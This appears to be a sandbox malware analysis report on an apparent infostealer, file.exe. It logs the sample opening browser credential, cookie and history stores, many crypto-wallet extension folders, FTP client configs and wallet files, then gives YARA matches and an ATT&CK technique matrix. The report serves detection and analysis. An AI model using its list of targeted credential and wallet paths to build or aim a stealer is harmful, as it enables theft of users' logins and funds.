              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BXAJUJAOEOJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BXAJUJAOEOJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BXAJUJAOEOJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BXAJUJAOEOJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BXAJUJAOEOJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BXAJUJAOEOJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BXAJUJAOEOJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BXAJUJAOEOJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BXAJUJAOEOJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BXAJUJAOEOJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BXAJUJAOEOJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BXAJUJAOEOJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BXAJUJAOEOJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BXAJUJAOEOJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BXAJUJAOEOJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BXAJUJAOEOJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
              Source: Yara matchFile source: 00000000.00000003.1329734149.0000000000783000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1329889525.0000000000783000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1329634294.0000000000783000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1315198830.000000000077E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1287375743.0000000000783000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1300615651.0000000000781000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1315667210.000000000077E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1286771741.0000000000783000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 4048, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 4048, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              Process Injection
              11
              Virtualization/Sandbox Evasion
              2
              OS Credential Dumping
              121
              Security Software Discovery
              Remote Services1
              Screen Capture
              21
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell
              Boot or Logon Initialization Scripts1
              DLL Side-Loading
              1
              Process Injection
              LSASS Memory11
              Virtualization/Sandbox Evasion
              Remote Desktop Protocol1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Deobfuscate/Decode Files or Information
              Security Account Manager1
              Process Discovery
              SMB/Windows Admin Shares41
              Data from Local System
              3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
              Obfuscated Files or Information
              NTDS1
              File and Directory Discovery
              Distributed Component Object ModelInput Capture114
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script22
              Software Packing
              LSA Secrets22
              System Information Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
